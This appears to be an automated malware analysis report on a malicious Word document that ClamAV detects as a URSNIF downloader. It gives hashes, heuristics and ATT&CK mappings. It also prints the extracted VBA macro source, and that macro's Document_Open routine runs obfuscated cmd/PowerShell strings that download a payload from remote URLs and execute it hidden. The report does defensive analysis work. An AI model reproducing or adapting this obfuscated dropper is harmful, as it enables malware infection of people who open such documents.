Office (OLE) malware analysis — malicious · 85bad524b2c46f29

MALICIOUS

Office (OLE)

78.6 KB Created: 2018-09-10 21:15:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 7ca7b4649e51eeeefdab76d19fa6b4e7 SHA-1: bafaf43b6c5ea7edbd9cfbfe1a23bb5f06a2d6ff SHA-256: 85bad524b2c46f29ea8da4d84924e46ff83ddec005faf49aaa1be7dbb43befa6

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with a Document_Open subroutine that calls the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' further supports this behavior.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7174 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7174 bytes
SHA-256: `5f8a1c444c592edb1d2967faefed8309f0ebc55a13bce4e425c2e5a1d2288369`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "siihnQzZwrK" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Second "502007906" + "3464" + "ha" + "IUlC" Second "168363839" + "558" Second "SLI" + "2898" Second "6173" + "SJck" + "kIEndqMhY" + "72298554" Second "ukACBzcO" + "wS" + "ENRG" + "381714750" Second "cMKFizODIOQiHv" + "sAEZ" + "tpjUtAb" + "5174" Second "1628" + "NdP" Shell opPBiOX + NwFOZqENbLs + bjJLRqi, CStr(vbHide) Second "qTMTmwz" + "dfPLLcSA" + "48194564" + "Id" Second "w" + "DQtQc" Second "XdlGGdobRNuhJY" + "7100" + "332605776" + "KnPt" End Sub Attribute VB_Name = "zmInYFhpNNLcd" Function opPBiOX() On _ Error _ Resume _ Next Second "99780980" + "1534" + "VPI" + "2375" Second "MSPw" + "Db" Second "hRDJ" + "BwHp" ozkVTiMOmw = Format(Chr(10 + 12 + 14 + 15 + 48)) + "md /V^" + ":^ON/" + Format(Chr(7 + 8 + 9 + 10 + 33)) + Format(Chr(3 + 3 + 4 + 4 + 20)) + "^s" + "^e^" + "t " Second "XAtjHHi" + "765" Second "8332" + "UniY" + "1463" + "7460" Second "524424264" + "6563" + "8666" + "3888" Second "327681727" + "260" + "GuU" + "iVY" KcfNoKZ = "^G^2z= " + "^ ^ ^ " + "^ " + " ^ ^ " + " ^ ^ ^" + " ^ " + "^ ^" + " }}{^h" Second "KzDiRs" + "pKHt" Second "lFMR" + "HhENiYlQSpM" + "3576" + "5496" Second "AiCU" + "207664372" + "9886" + "nUhJzPc" Second "2042" + "qr" + "5109" + "37044684" YrfwMiXVzPt = Format(Chr(10 + 12 + 14 + 15 + 48)) + "^" + "ta" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^};^" + "k" + "^a^e" + "r" + "^b^;^p^" + "it^$" Second "TCUDYn" + "w" Second "IGjn" + "9906" + "RvPOGpps" + "3760" Second "Ba" + "jD" + "364542111" + "FwfEToNj" Second "366743752" + "981" + "9849" + "QsYV" Second "29957626" + "JpiXEvbR" FzcbXbWR = " ^m^etI" + "-^ek" + "^" + "ovn^" + "I;)p^i" + "t" + "$ ,KJ^L" + "$(" Second "RaBo" + "drQ" + "mapk" + "fon" Second "k" + "278043957" Second "182489465" + "6861" + "163322001" + "9549" BjJXrBTfzL = "^eli" + "^F^" + "da^o" + "lnw^" + "o" + "^D" + ".^W" + "N^j^$^" + "{^yrt^{" + ")^" + "lv^j^$" + " ni^ " + "KJ^L" Second "491129191" + "YAj" + "205078210" + "K" Second "KPPBGzzr" + "PVdC" + "BN" + "273188467" Second "PfASZRwnaJ" + "1452" + "bvXwK" + "300949384" Second "iwSZtkiFqHKQ" + "4230" Second "fXAI" + "jiqq" + "1707" + "9921" zjOcZfboY = "^$(h" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "a" + "^er^of^" + ";'" + "^e^x" + "^e.^'^" + "+^" + "M^i^q^$" + "^+'^" + "\'^+" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "i" + "lb" Second "2480" + "RPwsod" Second "106283584" + "zCNJS" Second "259140402" + "GT" izwiaHzkGK = "u^p^:" + "vn^e$" + "=^p^it" + "^" + "$^;" opPBiOX = ozkVTiMOmw + KcfNoKZ + YrfwMiXVzPt + FzcbXbWR + BjJXrBTfzL + zjOcZfboY + izwiaHzkGK Second "473616217" + "1509" Second "zffchGpT" + "jar" + "zJQ" + "lEf" Second "LdzWj" + "pfQobarCuwSc" Second "CMp" + "ssotNkfLcU" End Function Function NwFOZqENbLs() On _ Error _ Resume _ Next Second "150465629" + "NwiqWqMaX" + "tiJsBsISUADc" + "1121" sPTDddBhJDX = "^'" + "^0^1^7" + "' =" + " ^Miq^$" + ";)'@^'(" + "^tilp^S" + "." + "'euUV" + "jul^Lg/" + "^51^0^2" + "4^1^0" Second "Vi" + "250532306" + "MJr" + "240933360" jDdpo = "^" + "2^_^kin" + "ne^izd" + "/l" + "p^." + "s^u" + "^k" + "inne^i^" + "z" + "^d^." + "^dlr^o" + "w" + "^" Second "1742" + "63444735" + "173804911" + "5892" Second "hUfN" + "304821651" QBwTrjd = "lo^oh" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^" + "s//^:^p" + "t^th@" + "^0^h^" + "s" Second "50181086" + "mY" + "6314" + "GzhDLjNoCHNt" Second "464247852" + "169285053" + "t" + "iwiJsGKJzmuksS" Second "I" + "NNzqjfuT" + "cF" + "XwjD" WhOhRD = "^6Rg^s" + "gV5/re" + "^g" + "^" + "ana^m/l" + "p^.n^" + "u" + "r-^og/" + "/:^ptt" + "^h^@H^" + "S^0^" + "2^O" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^4" Second "hfUUrZVHEBmHi" + "2408 ... (truncated)

SHA-256: 5f8a1c444c592edb1d2967faefed8309f0ebc55a13bce4e425c2e5a1d2288369

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "siihnQzZwrK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "502007906" + "3464" + "ha" + "IUlC"
   Second "168363839" + "558"
   Second "SLI" + "2898"
   Second "6173" + "SJck" + "kIEndqMhY" + "72298554"
   Second "ukACBzcO" + "wS" + "ENRG" + "381714750"
   Second "cMKFizODIOQiHv" + "sAEZ" + "tpjUtAb" + "5174"
   Second "1628" + "NdP"
Shell opPBiOX + NwFOZqENbLs + bjJLRqi, CStr(vbHide)
   Second "qTMTmwz" + "dfPLLcSA" + "48194564" + "Id"
   Second "w" + "DQtQc"
   Second "XdlGGdobRNuhJY" + "7100" + "332605776" + "KnPt"
End Sub



Attribute VB_Name = "zmInYFhpNNLcd"
Function opPBiOX()

On _
Error _
Resume _
Next
Second "99780980" + "1534" + "VPI" + "2375"
   Second "MSPw" + "Db"
   Second "hRDJ" + "BwHp"
ozkVTiMOmw = Format(Chr(10 + 12 + 14 + 15 + 48)) + "md /V^" + ":^ON/" + Format(Chr(7 + 8 + 9 + 10 + 33)) + Format(Chr(3 + 3 + 4 + 4 + 20)) + "^s" + "^e^" + "t "
Second "XAtjHHi" + "765"
   Second "8332" + "UniY" + "1463" + "7460"
   Second "524424264" + "6563" + "8666" + "3888"
   Second "327681727" + "260" + "GuU" + "iVY"
KcfNoKZ = "^G^2z= " + "^ ^ ^ " + "^ " + " ^ ^ " + " ^ ^  ^" + " ^ " + "^  ^" + " }}{^h"
Second "KzDiRs" + "pKHt"
   Second "lFMR" + "HhENiYlQSpM" + "3576" + "5496"
   Second "AiCU" + "207664372" + "9886" + "nUhJzPc"
   Second "2042" + "qr" + "5109" + "37044684"
YrfwMiXVzPt = Format(Chr(10 + 12 + 14 + 15 + 48)) + "^" + "ta" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^};^" + "k" + "^a^e" + "r" + "^b^;^p^" + "it^$"
Second "TCUDYn" + "w"
   Second "IGjn" + "9906" + "RvPOGpps" + "3760"
   Second "Ba" + "jD" + "364542111" + "FwfEToNj"
   Second "366743752" + "981" + "9849" + "QsYV"
   Second "29957626" + "JpiXEvbR"
FzcbXbWR = " ^m^etI" + "-^ek" + "^" + "ovn^" + "I;)p^i" + "t" + "$ ,KJ^L" + "$("
Second "RaBo" + "drQ" + "mapk" + "fon"
   Second "k" + "278043957"
   Second "182489465" + "6861" + "163322001" + "9549"
BjJXrBTfzL = "^eli" + "^F^" + "da^o" + "lnw^" + "o" + "^D" + ".^W" + "N^j^$^" + "{^yrt^{" + ")^" + "lv^j^$" + " ni^ " + "KJ^L"
Second "491129191" + "YAj" + "205078210" + "K"
   Second "KPPBGzzr" + "PVdC" + "BN" + "273188467"
   Second "PfASZRwnaJ" + "1452" + "bvXwK" + "300949384"
   Second "iwSZtkiFqHKQ" + "4230"
   Second "fXAI" + "jiqq" + "1707" + "9921"
zjOcZfboY = "^$(h" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "a" + "^er^of^" + ";'" + "^e^x" + "^e.^'^" + "+^" + "M^i^q^$" + "^+'^" + "\'^+" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "i" + "lb"
Second "2480" + "RPwsod"
   Second "106283584" + "zCNJS"
   Second "259140402" + "GT"
izwiaHzkGK = "u^p^:" + "vn^e$" + "=^p^it" + "^" + "$^;"
opPBiOX = ozkVTiMOmw + KcfNoKZ + YrfwMiXVzPt + FzcbXbWR + BjJXrBTfzL + zjOcZfboY + izwiaHzkGK
   Second "473616217" + "1509"
   Second "zffchGpT" + "jar" + "zJQ" + "lEf"
   Second "LdzWj" + "pfQobarCuwSc"
   Second "CMp" + "ssotNkfLcU"
End Function
Function NwFOZqENbLs()

On _
Error _
Resume _
Next
Second "150465629" + "NwiqWqMaX" + "tiJsBsISUADc" + "1121"
sPTDddBhJDX = "^'" + "^0^1^7" + "' =" + " ^Miq^$" + ";)'@^'(" + "^tilp^S" + "." + "'euUV" + "jul^Lg/" + "^51^0^2" + "4^1^0"
Second "Vi" + "250532306" + "MJr" + "240933360"
jDdpo = "^" + "2^_^kin" + "ne^izd" + "/l" + "p^." + "s^u" + "^k" + "inne^i^" + "z" + "^d^." + "^dlr^o" + "w" + "^"
Second "1742" + "63444735" + "173804911" + "5892"
   Second "hUfN" + "304821651"
QBwTrjd = "lo^oh" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^" + "s//^:^p" + "t^th@" + "^0^h^" + "s"
Second "50181086" + "mY" + "6314" + "GzhDLjNoCHNt"
   Second "464247852" + "169285053" + "t" + "iwiJsGKJzmuksS"
   Second "I" + "NNzqjfuT" + "cF" + "XwjD"
WhOhRD = "^6Rg^s" + "gV5/re" + "^g" + "^" + "ana^m/l" + "p^.n^" + "u" + "r-^og/" + "/:^ptt" + "^h^@H^" + "S^0^" + "2^O" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^4"
Second "hfUUrZVHEBmHi" + "2408
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.